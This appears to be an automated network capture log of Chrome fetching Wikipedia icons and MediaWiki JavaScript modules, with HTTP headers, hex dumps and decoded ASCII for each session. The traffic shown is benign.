                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 10:34:47 GMT
                                                                                                                                                                                                                                      etag: W/"11c23"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 11:01:48 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''menu.svg
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/304957
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 221
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC221INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 3e 3c 74 69 74 6c 65 3e 0a 09 09 6d 65 6e 75 0a 09 3c 2f 74 69 74 6c 65 3e 3c 67 20 66 69 6c 6c 3d 22 23 30 30 30 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 20 33 76 32 68 31 38 56 33 7a 6d 30 20 38 68 31 38 56 39 48 31 7a 6d 30 20 36 68 31 38 76 2d 32 48 31 7a 22 2f 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>menu</title><g fill="#000"><path d="M1 3v2h18V3zm0 8h18V9H1zm0 6h18v-2H1z"/></g></svg>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      60192.168.2.1649785185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC1808OUTGET /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientP [TRUNCATED]
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC2451INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 00:04:23 GMT
                                                                                                                                                                                                                                      server: mw-web.eqiad.main-5b5448fd78-tvq8z
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      expires: Thu, 06 Feb 2025 00:04:23 GMT
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector. [TRUNCATED]
                                                                                                                                                                                                                                      link: </static/images/project-logos/enwiki.png>;rel=preload;as=image;media=not all and (min-resolution: 1.5dppx),</static/images/project-logos/enwiki-1.5x.png>;rel=preload;as=image;media=(min-resolution: 1.5dppx) and (max-resolution: 1.999999dppx),</static/images/project-logos/enwiki-2x.png>;rel=preload;as=image;media=(min-resolution: 2dppx)
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      etag: W/"5bkcg"
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 miss, cp3072 hit/27899
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 816035
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC12340INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 2e 63 68 6f 69 63 65 44 61 74 61 40 61 30 79 68 75 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 6d 77 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 3d 28 6d 77 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 7c 7c 7b 7d 29 3b 6d 77 2e 63 65 6e 74 72 61 6c 4e 6f 74 69 63 65 2e 63 68 6f 69 63 65 44 61 74 61 3d 5b 7b 22 6e 61 6d 65 22 3a 22 43 32 34 5f 57 4d 44 45 5f 44 65 73 6b 74 6f 70 5f 45 4e 5f 74 79 22 2c 22 73 74 61 72 74 22 3a 31 37 33 35 38 32 32 38 30 30 2c 22 65 6e 64 22 3a 31 37 33 36 39 38 32 30 30 30 2c 22 70 72 65 66 65 72 72 65 64 22 3a 32
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.centralNotice.choiceData@a0yhu",function($,jQuery,require,module){mw.centralNotice=(mw.centralNotice||{});mw.centralNotice.choiceData=[{"name":"C24_WMDE_Desktop_EN_ty","start":1735822800,"end":1736982000,"preferred":2
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 42 61 6e 6e 65 72 53 68 6f 77 6e 28 29 3b 7d 70 72 6f 63 65 73 73 41 66 74 65 72 42 61 6e 6e 65 72 46 65 74 63 68 28 29 3b 7d 2c 72 65 63 6f 72 64 49 6d 70 72 65 73 73 69 6f 6e 44 65 6c 61 79 50 72 6f 6d 69 73 65 73 3a 5b 5d 2c 72 65 63 6f 72 64 49 6d 70 72 65 73 73 69 6f 6e 44 65 66 65 72 72 65 64 4f 62 6a 3a 6e 75 6c 6c 2c 69 6e 74 65 72 6e 61 6c 3a 7b 7d 2c 73 65 74 42 61 6e 6e 65 72 73 4e 6f 74 47 75 61 72 61 6e 74 65 65 64 54 6f 44 69 73 70 6c 61 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6e 2e 69 6e 74 65 72 6e 61 6c 2e 73 74 61 74 65 2e 73 65 74 42 61 6e 6e 65 72 73 4e 6f 74 47 75 61 72 61 6e 74 65 65 64 54 6f 44 69 73 70 6c 61 79 28 29 3b 7d 2c 66 61 69 6c 43 61 6d 70 61 69 67 6e 3a 66 75 6e 63 74 69 6f 6e 28 72 65 61 73 6f 6e 29 7b 63 6e 2e 69 6e
                                                                                                                                                                                                                                      Data Ascii: BannerShown();}processAfterBannerFetch();},recordImpressionDelayPromises:[],recordImpressionDeferredObj:null,internal:{},setBannersNotGuaranteedToDisplay:function(){cn.internal.state.setBannersNotGuaranteedToDisplay();},failCampaign:function(reason){cn.in
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC4108INData Raw: 61 72 20 69 2c 63 61 6d 70 61 69 67 6e 2c 6e 6f 77 3d 6e 65 77 20 44 61 74 65 28 29 2c 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65 50 6c 75 73 4c 65 65 77 61 79 3b 66 6f 72 28 69 3d 30 3b 69 3c 63 68 6f 69 63 65 44 61 74 61 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 63 61 6d 70 61 69 67 6e 3d 63 68 6f 69 63 65 44 61 74 61 5b 69 5d 3b 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65 50 6c 75 73 4c 65 65 77 61 79 3d 6e 65 77 20 44 61 74 65 28 29 3b 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65 50 6c 75 73 4c 65 65 77 61 79 2e 73 65 74 54 69 6d 65 28 28 63 61 6d 70 61 69 67 6e 2e 65 6e 64 2a 31 30 30 30 29 2b 28 43 41 4d 50 41 49 47 4e 5f 53 54 41 4c 45 4e 45 53 53 5f 4c 45 45 57 41 59 2a 36 30 30 30 30 29 29 3b 69 66 28 63 61 6d 70 61 69 67 6e 45 6e 64 44 61 74 65
                                                                                                                                                                                                                                      Data Ascii: ar i,campaign,now=new Date(),campaignEndDatePlusLeeway;for(i=0;i<choiceData.length;i++){campaign=choiceData[i];campaignEndDatePlusLeeway=new Date();campaignEndDatePlusLeeway.setTime((campaign.end*1000)+(CAMPAIGN_STALENESS_LEEWAY*60000));if(campaignEndDate
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 72 69 65 76 65 50 72 6f 63 65 73 73 41 6e 64 47 65 74 28 29 3b 7d 2c 0a 67 65 74 42 75 63 6b 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 75 63 6b 65 74 73 5b 63 61 6d 70 61 69 67 6e 2e 6e 61 6d 65 5d 2e 76 61 6c 3b 7d 2c 67 65 74 52 65 64 75 63 65 64 42 75 63 6b 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 75 63 6b 65 74 65 72 2e 67 65 74 42 75 63 6b 65 74 28 29 25 63 61 6d 70 61 69 67 6e 2e 62 75 63 6b 65 74 5f 63 6f 75 6e 74 3b 7d 2c 73 65 74 42 75 63 6b 65 74 3a 66 75 6e 63 74 69 6f 6e 28 76 61 6c 29 7b 62 75 63 6b 65 74 73 5b 63 61 6d 70 61 69 67 6e 2e 6e 61 6d 65 5d 2e 76 61 6c 3d 76 61 6c 3b 73 74 6f 72 65 42 75 63 6b 65 74 73 28 29 3b 7d 7d 3b 7d 28 29 29 3b 0a 7d
                                                                                                                                                                                                                                      Data Ascii: function(){retrieveProcessAndGet();},getBucket:function(){return buckets[campaign.name].val;},getReducedBucket:function(){return bucketer.getBucket()%campaign.bucket_count;},setBucket:function(val){buckets[campaign.name].val=val;storeBuckets();}};}());}
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 27 3b 27 29 2c 69 2c 6d 61 74 63 68 65 73 2c 72 3d 6e 65 77 20 52 65 67 45 78 70 28 27 5e 27 2b 50 52 45 46 49 58 5f 41 4e 44 5f 53 45 50 41 52 41 54 4f 52 5f 49 4e 5f 43 4f 4f 4b 49 45 53 2b 27 5b 5e 3d 5d 2a 28 3f 3d 3d 29 27 29 3b 66 6f 72 28 69 3d 30 3b 69 3c 63 6f 6f 6b 69 65 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 6d 61 74 63 68 65 73 3d 63 6f 6f 6b 69 65 73 5b 69 5d 2e 74 72 69 6d 28 29 2e 6d 61 74 63 68 28 72 29 3b 69 66 28 6d 61 74 63 68 65 73 29 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 6d 61 74 63 68 65 73 5b 30 5d 2b 27 3d 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 3b 20 70 61 74 68 3d 2f 27 3b 7d 7d 7d
                                                                                                                                                                                                                                      Data Ascii: ument.cookie.split(';'),i,matches,r=new RegExp('^'+PREFIX_AND_SEPARATOR_IN_COOKIES+'[^=]*(?==)');for(i=0;i<cookies.length;i++){matches=cookies[i].trim().match(r);if(matches){document.cookie=matches[0]+'=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/';}}}
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC128INData Raw: 6f 6e 3a 27 61 64 64 27 2c 74 65 78 74 3a 6d 77 2e 6d 73 67 28 27 63 78 2d 75 6c 73 2d 74 72 61 6e 73 6c 61 74 65 2d 70 61 67 65 2d 71 75 69 63 6b 2d 61 63 74 69 6f 6e 2d 6c 61 62 65 6c 27 29 2c 68 72 65 66 3a 63 78 45 6e 74 72 79 70 6f 69 6e 74 55 72 6c 7d 3b 6d 77 2e 75 6c 73 2e 41 63 74 69 6f 6e 73 4d 65 6e 75 49 74 65 6d 73 52 65 67 69 73 74 72 79 2e 72 65 67 69 73 74 65 72 28
                                                                                                                                                                                                                                      Data Ascii: on:'add',text:mw.msg('cx-uls-translate-page-quick-action-label'),href:cxEntrypointUrl};mw.uls.ActionsMenuItemsRegistry.register(
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 74 72 61 6e 73 6c 61 74 65 41 63 74 69 6f 6e 49 74 65 6d 29 3b 7d 28 29 29 3b 0a 7d 7d 7d 2c 7b 7d 2c 7b 22 63 78 2d 75 6c 73 2d 74 72 61 6e 73 6c 61 74 65 2d 70 61 67 65 2d 71 75 69 63 6b 2d 61 63 74 69 6f 6e 2d 6c 61 62 65 6c 22 3a 22 54 72 61 6e 73 6c 61 74 65 20 74 68 69 73 20 70 61 67 65 22 7d 5d 3b 7d 29 3b 0a 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 65 63 68 6f 2e 63 65 6e 74 72 61 6c 61 75 74 68 40 31 38 6d 61 38 22 2c 7b 22 6d 61 69 6e 22 3a 22 65 78 74 2e 65 63 68 6f 2e 63 65 6e 74 72 61 6c 61 75 74 68 2e 6a 73 22 2c 22 66 69 6c 65 73 22 3a 7b 22 65 78 74 2e 65 63 68 6f 2e 63 65 6e 74 72 61 6c 61 75 74 68 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 72 65 71 75 69 72 65 2c 6d
                                                                                                                                                                                                                                      Data Ascii: translateActionItem);}());}}},{},{"cx-uls-translate-page-quick-action-label":"Translate this page"}];});mw.loader.impl(function(){return["ext.echo.centralauth@18ma8",{"main":"ext.echo.centralauth.js","files":{"ext.echo.centralauth.js":function(require,m
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 77 73 69 6e 67 5f 73 65 73 73 69 6f 6e 5f 74 6f 6b 65 6e 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 6e 61 6d 65 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 69 73 5f 62 6f 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 69 73 5f 6c 6f 67 67 65 64 5f 69 6e 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 65 64 69 74 5f 63 6f 75 6e 74 5f 62 75 63 6b 65 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 67 72 6f 75 70 73 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 5f 64 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 69 73 5f 74 65 6d 70 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 6c 61 6e 67 75 61 67 65 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 6c 61 6e 67 75 61 67 65 5f 76 61 72 69 61 6e 74 22 2c 22 70 65 72 66 6f 72 6d 65 72 5f 70 61 67 65 76 69 65 77 5f 69 64 22 5d 7d 7d
                                                                                                                                                                                                                                      Data Ascii: wsing_session_token","performer_name","performer_is_bot","performer_is_logged_in","performer_edit_count_bucket","performer_groups","performer_registration_dt","performer_is_temp","performer_language","performer_language_variant","performer_pageview_id"]}}
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC128INData Raw: 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 66 75 6e 63 74 69 6f 6e 20 69 73 56 61 6c 69 64 53 61 6d 70 6c 65 28 73 61 6d 70 6c 65 29 7b 72 65 74 75 72 6e 21 21 28 73 61 6d 70 6c 65 26 26 73 61 6d 70 6c 65 2e 75 6e 69 74 26 26 73 61 6d 70 6c 65 2e 72 61 74 65 26 26 73 61 6d 70 6c 65 2e 72 61 74 65 3e 3d 30 26 26 73 61 6d 70 6c 65 2e 72 61 74 65 3c 3d 31 29 3b 7d 6d 6f 64 75 6c 65
                                                                                                                                                                                                                                      Data Ascii: odule,exports){function isValidSample(sample){return!!(sample&&sample.unit&&sample.rate&&sample.rate>=0&&sample.rate<=1);}module
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 2e 65 78 70 6f 72 74 73 3d 7b 69 73 56 61 6c 69 64 53 61 6d 70 6c 65 3a 69 73 56 61 6c 69 64 53 61 6d 70 6c 65 7d 3b 0a 7d 2c 22 65 78 74 2e 65 76 65 6e 74 4c 6f 67 67 69 6e 67 2f 4d 65 64 69 61 57 69 6b 69 4d 65 74 72 69 63 73 43 6c 69 65 6e 74 49 6e 74 65 67 72 61 74 69 6f 6e 2e 6a 73 22 3a 66 75 6e 63 74 69 6f 6e 28 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 29 7b 63 6f 6e 73 74 20 63 3d 6d 77 2e 63 6f 6e 66 69 67 2e 67 65 74 2e 62 69 6e 64 28 6d 77 2e 63 6f 6e 66 69 67 29 3b 6c 65 74 20 63 6f 6e 74 65 78 74 41 74 74 72 69 62 75 74 65 73 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 4d 65 64 69 61 57 69 6b 69 4d 65 74 72 69 63 73 43 6c 69 65 6e 74 49 6e 74 65 67 72 61 74 69 6f 6e 28 29 7b 7d 4d 65 64 69 61 57 69 6b 69 4d 65 74 72
                                                                                                                                                                                                                                      Data Ascii: .exports={isValidSample:isValidSample};},"ext.eventLogging/MediaWikiMetricsClientIntegration.js":function(require,module,exports){const c=mw.config.get.bind(mw.config);let contextAttributes=null;function MediaWikiMetricsClientIntegration(){}MediaWikiMetr


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      61192.168.2.1649786185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC595OUTGET /w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 06:09:01 GMT
                                                                                                                                                                                                                                      etag: W/"11c23"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 06:32:17 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''ellipsis.svg
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/420577
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 268
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC268INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 3e 3c 74 69 74 6c 65 3e 0a 09 09 65 6c 6c 69 70 73 69 73 0a 09 3c 2f 74 69 74 6c 65 3e 3c 67 20 66 69 6c 6c 3d 22 23 30 30 30 22 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 31 30 22 20 63 79 3d 22 31 30 22 20 72 3d 22 32 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 33 22 20 63 79 3d 22 31 30 22 20 72 3d 22 32 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 31 37 22 20 63 79 3d 22 31 30 22 20 72 3d 22 32 22
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>ellipsis</title><g fill="#000"><circle cx="10" cy="10" r="2"/><circle cx="3" cy="10" r="2"/><circle cx="17" cy="10" r="2"


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      62192.168.2.1649788185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC615OUTGET /w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC1007INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 07:31:13 GMT
                                                                                                                                                                                                                                      etag: W/"11c23"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 08:14:41 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''language.svg
                                                                                                                                                                                                                                      access-control-allow-origin: *
